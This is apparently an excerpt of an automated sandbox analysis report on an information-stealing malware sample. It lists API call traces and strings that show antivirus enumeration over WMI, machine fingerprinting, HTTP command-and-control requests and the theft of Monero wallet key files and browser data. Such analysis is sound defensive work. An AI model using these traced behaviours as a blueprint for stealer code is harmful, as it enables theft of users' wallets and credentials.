                                                                                                                                                                              • Opcode Fuzzy Hash: 6ff5bd26c6b7ad451cf0f351e26cd98f87683b013ee48d897e5f1f972183ff32
                                                                                                                                                                              • Instruction Fuzzy Hash: ABB117758812289BCF60EF54DD88BDA77B9BF18310F0005E5E94AA7261EF70DA98CF50
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AE8
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AEE
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AF4
                                                                                                                                                                                • Part of subcall function 02A04AB6: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04B06
                                                                                                                                                                                • Part of subcall function 02A04AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04B0E
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A069C5
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 02A069DF
                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A06A0E
                                                                                                                                                                              • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 02A06A4D
                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A06A7D
                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02A06A88
                                                                                                                                                                              • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 02A06AAC
                                                                                                                                                                              • InternetReadFile.WININET(?,?,000007CF,?), ref: 02A06B40
                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 02A06B50
                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 02A06B5C
                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 02A06B68
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                                                                              • String ID: ERROR$ERROR$GET
                                                                                                                                                                              • API String ID: 3863758870-2509457195
                                                                                                                                                                              • Opcode ID: 088bff6095d722cc2f44636f32574c1392118b0bf539af47f03b8412863bb12f
                                                                                                                                                                              • Instruction ID: f90662611cb5d191b73fff962bedc440bbc418ae60f1fa3cd6472e66f0313b5d
                                                                                                                                                                              • Opcode Fuzzy Hash: 088bff6095d722cc2f44636f32574c1392118b0bf539af47f03b8412863bb12f
                                                                                                                                                                              • Instruction Fuzzy Hash: CC515F71940269AFEB21AF50EDC4BAEB7BDFB04744F0081A5F549A6090DF309ED59F90
                                                                                                                                                                              APIs
                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 02A1199E
                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000000), ref: 02A119AD
                                                                                                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02A119BE
                                                                                                                                                                              • CoCreateInstance.COMBASE(02A32F00,00000000,00000001,02A32E30,?), ref: 02A119D8
                                                                                                                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02A11A0E
                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 02A11A5D
                                                                                                                                                                                • Part of subcall function 02A11D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,02A11A80,?), ref: 02A11D4A
                                                                                                                                                                                • Part of subcall function 02A11D42: CharToOemW.USER32(?,00000000), ref: 02A11D56
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 02A11A8B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                              • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                              • API String ID: 4288110179-315474579
                                                                                                                                                                              • Opcode ID: ed9ecce172319be349d8278548e9aa73ac249ea08356b8753cf56654c283daf3
                                                                                                                                                                              • Instruction ID: 1bf1a76a05777094d8ccf32852d445f480852d56e4d7510fcf67f1fb4732cd26
                                                                                                                                                                              • Opcode Fuzzy Hash: ed9ecce172319be349d8278548e9aa73ac249ea08356b8753cf56654c283daf3
                                                                                                                                                                              • Instruction Fuzzy Hash: 5D313B70A40245BBEB219B95CC49EAFBF7DFBC5B20F104609F612AA190DE749941CB70
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A012A7
                                                                                                                                                                              • _memset.LIBCMT ref: 02A012B6
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3A9EC), ref: 02A012D0
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3A9F0), ref: 02A012DE
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3A9F4), ref: 02A012EC
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3A9F8), ref: 02A012FA
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3A9FC), ref: 02A01308
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3AA00), ref: 02A01316
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3AA04), ref: 02A01324
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3AA08), ref: 02A01332
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3AA0C), ref: 02A01340
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3AA10), ref: 02A0134E
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3AA14), ref: 02A0135C
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3AA18), ref: 02A0136A
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3AA1C), ref: 02A01378
                                                                                                                                                                                • Part of subcall function 02A10C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A01385), ref: 02A10C91
                                                                                                                                                                                • Part of subcall function 02A10C85: RtlAllocateHeap.NTDLL(00000000), ref: 02A10C98
                                                                                                                                                                                • Part of subcall function 02A10C85: GetComputerNameA.KERNEL32(00000000,02A01385), ref: 02A10CAC
                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 02A013E3
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$HeapProcess_memset$AllocateComputerExitName
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2891980384-0
                                                                                                                                                                              • Opcode ID: d5b917b9097a9928cd234f920c30982338ee0b088c377f3945afd9cc17fb7520
                                                                                                                                                                              • Instruction ID: 5a2ae9810f4371231af4afe6856d877d89d06a4de115aab7607aa7dc283dfc21
                                                                                                                                                                              • Opcode Fuzzy Hash: d5b917b9097a9928cd234f920c30982338ee0b088c377f3945afd9cc17fb7520
                                                                                                                                                                              • Instruction Fuzzy Hash: AC418FA2E4423866EF21DBB09C99FDA7BACAF15310F5009D1E5C9E3041DF74DA888B90
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,02A3670F,00000000,?,?), ref: 02A11273
                                                                                                                                                                              • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 02A112B0
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A112DD
                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 02A112FC
                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 02A11332
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A11347
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,02A36E8C), ref: 02A113DC
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02A11446
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02A11466
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02A11472
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                                                                              • String ID: - $%s\%s$?
                                                                                                                                                                              • API String ID: 2394436309-3278919252
                                                                                                                                                                              • Opcode ID: c5b70c01e55cb68ce6d612ac079ba52d943a0bd1e1b158d963bb41991b64ff75
                                                                                                                                                                              • Instruction ID: 80de5aea35e04596e98317b0f454f2cbb87713f5d4212ed9742f75a9dac8b59a
                                                                                                                                                                              • Opcode Fuzzy Hash: c5b70c01e55cb68ce6d612ac079ba52d943a0bd1e1b158d963bb41991b64ff75
                                                                                                                                                                              • Instruction Fuzzy Hash: DF61F4B594022CABEB219F14DD84FDAB7B9EB44714F5046E2AA09B2111DF30AFD9CF50
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 02A109D5
                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02A10A15
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 02A10A6A
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A10A71
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A10AA7
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A36E3C), ref: 02A10AB6
                                                                                                                                                                                • Part of subcall function 02A11684: GetCurrentHwProfileA.ADVAPI32(?), ref: 02A1169F
                                                                                                                                                                                • Part of subcall function 02A11684: _memset.LIBCMT ref: 02A116CE
                                                                                                                                                                                • Part of subcall function 02A11684: lstrcat.KERNEL32(?,00000000), ref: 02A116F6
                                                                                                                                                                                • Part of subcall function 02A11684: lstrcat.KERNEL32(?,02A36ECC), ref: 02A11713
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A10ACD
                                                                                                                                                                                • Part of subcall function 02A123D5: malloc.MSVCRT ref: 02A123DA
                                                                                                                                                                                • Part of subcall function 02A123D5: strncpy.MSVCRT ref: 02A123EB
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02A10AF0
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$Heap$AllocateCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                              • String ID: :\$C$QuBi
                                                                                                                                                                              • API String ID: 3915896539-239756005
                                                                                                                                                                              • Opcode ID: fcc7bfabf93c52e1aa1c3aa2e3746eb201a480448f42546b5c0141dcb829af9f
                                                                                                                                                                              • Instruction ID: 4f9a927cbc389ea9f2fc20b5a1fc47ff8bf14aa9315e6f3f13fbdd598df7ab7a
                                                                                                                                                                              • Opcode Fuzzy Hash: fcc7bfabf93c52e1aa1c3aa2e3746eb201a480448f42546b5c0141dcb829af9f
                                                                                                                                                                              • Instruction Fuzzy Hash: AD41AC71D84228ABCB259F789D85ADEBABDEF09310F0001E5F509E2110EA308FD58F64
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A06963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A069C5
                                                                                                                                                                                • Part of subcall function 02A06963: StrCmpCA.SHLWAPI(?), ref: 02A069DF
                                                                                                                                                                                • Part of subcall function 02A06963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A06A0E
                                                                                                                                                                                • Part of subcall function 02A06963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 02A06A4D
                                                                                                                                                                                • Part of subcall function 02A06963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A06A7D
                                                                                                                                                                                • Part of subcall function 02A06963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02A06A88
                                                                                                                                                                                • Part of subcall function 02A06963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 02A06AAC
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A1691A
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A16925
                                                                                                                                                                                • Part of subcall function 02A11E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,02A16931,?), ref: 02A11E37
                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,?), ref: 02A1693A
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A16949
                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02A16962
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                              • API String ID: 4174444224-1526165396
                                                                                                                                                                              • Opcode ID: 87b1277eba69908a4daa475a73c944a8843027920d487211ed260b95781889ca
                                                                                                                                                                              • Instruction ID: f985e27b0c2fa109a85a22a64dc43b5b9a61ed4de5f85caa3ece9e1504bc0211
                                                                                                                                                                              • Opcode Fuzzy Hash: 87b1277eba69908a4daa475a73c944a8843027920d487211ed260b95781889ca
                                                                                                                                                                              • Instruction Fuzzy Hash: FB218C31D80218ABDB21BF74AD899AD77BDAF04B24B044225FD06E3150DF34D9558F95
                                                                                                                                                                              APIs
                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481), ref: 02A0EAF9
                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481), ref: 02A0EB56
                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 02A0EE1D
                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481), ref: 02A0EC33
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481), ref: 02A0ECE3
                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481), ref: 02A0ED40
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy
                                                                                                                                                                              • String ID: Stable\$ Stable\$firefox
                                                                                                                                                                              • API String ID: 3722407311-2697854757
                                                                                                                                                                              • Opcode ID: 2f5c2bfedcf929e3c3583947663ee3588efc318ef910eed4ba7308b0608cea6f
                                                                                                                                                                              • Instruction ID: 9504b6d8126c798b38714b2da1d318150179704b2ec8e6ba962ca6a174d66090
                                                                                                                                                                              • Opcode Fuzzy Hash: 2f5c2bfedcf929e3c3583947663ee3588efc318ef910eed4ba7308b0608cea6f
                                                                                                                                                                              • Instruction Fuzzy Hash: B8B13E32D40219AFDF10FFA8EA86B9D7776BF40324F554510ED05A7280DE30AA699FD1
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A01ADC
                                                                                                                                                                                • Part of subcall function 02A01A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 02A01A65
                                                                                                                                                                                • Part of subcall function 02A01A51: RtlAllocateHeap.NTDLL(00000000), ref: 02A01A6C
                                                                                                                                                                                • Part of subcall function 02A01A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,02A01AE9), ref: 02A01A89
                                                                                                                                                                                • Part of subcall function 02A01A51: RegQueryValueExA.ADVAPI32(02A01AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 02A01AA4
                                                                                                                                                                                • Part of subcall function 02A01A51: RegCloseKey.ADVAPI32(02A01AE9), ref: 02A01AAD
                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 02A01AF1
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A01AFE
                                                                                                                                                                              • lstrcat.KERNEL32(?,.keys), ref: 02A01B19
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A01C2A
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A07FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A07FC7
                                                                                                                                                                                • Part of subcall function 02A07FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FDE
                                                                                                                                                                                • Part of subcall function 02A07FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FF5
                                                                                                                                                                                • Part of subcall function 02A07FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A0800C
                                                                                                                                                                                • Part of subcall function 02A07FAC: CloseHandle.KERNEL32(?,?,?,?,?,02A0E756,?,?,?), ref: 02A08034
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A01C9D
                                                                                                                                                                                • Part of subcall function 02A16E97: CreateThread.KERNEL32(00000000,00000000,02A16DC6,?,00000000,00000000), ref: 02A16F36
                                                                                                                                                                                • Part of subcall function 02A16E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A16F3E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Filelstrcpy$lstrcat$CloseCreateHeaplstrlen$AllocAllocateCopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                                                                              • String ID: .keys$\Monero\wallet.keys
                                                                                                                                                                              • API String ID: 2164590784-3586502688
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AE8
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AEE
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AF4
                                                                                                                                                                                • Part of subcall function 02A04AB6: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04B06
                                                                                                                                                                                • Part of subcall function 02A04AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04B0E
                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A06836
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 02A06856
                                                                                                                                                                              • InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 02A06877
                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02A06892
                                                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02A068C8
                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 02A068F8
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 02A06923
                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 02A0692A
                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 02A06936
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2507841554-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 02A0FB52
                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 02A0FB7E
                                                                                                                                                                              • _memset.LIBCMT ref: 02A0FBC1
                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT(?), ref: 02A0FD17
                                                                                                                                                                                • Part of subcall function 02A0F030: _memmove.LIBCMT ref: 02A0F04A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: OpenProcess_memmove_memset
                                                                                                                                                                              • String ID: N0ZWFt
                                                                                                                                                                              • API String ID: 2647191932-431618156
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A11607
                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 02A11626
                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 02A1164B
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?), ref: 02A11657
                                                                                                                                                                              • CharToOemA.USER32(?,?), ref: 02A1166B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                                                              • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                              • API String ID: 2235053359-1211650757
                                                                                                                                                                              • Opcode ID: c9fb6b8cf4f2f257e24f0bc1010f4b10690290b470152bb0d314e2345630658d
                                                                                                                                                                              • Instruction ID: c00b4efbb53bee527b0b2d73403a37d5b13f05012a0153bef8882be792cbfe44
                                                                                                                                                                              • Opcode Fuzzy Hash: c9fb6b8cf4f2f257e24f0bc1010f4b10690290b470152bb0d314e2345630658d
                                                                                                                                                                              • Instruction Fuzzy Hash: 22113CB594022CAFEB10DF90DD89FAAB7BCEB04304F0005E5B619A2041DB709E988F10
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 02A01A65
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A01A6C
                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,02A01AE9), ref: 02A01A89
                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(02A01AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 02A01AA4
                                                                                                                                                                              • RegCloseKey.ADVAPI32(02A01AE9), ref: 02A01AAD
                                                                                                                                                                              Strings
                                                                                                                                                                              • SOFTWARE\monero-project\monero-core, xrefs: 02A01A7F
                                                                                                                                                                              • wallet_path, xrefs: 02A01A9C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
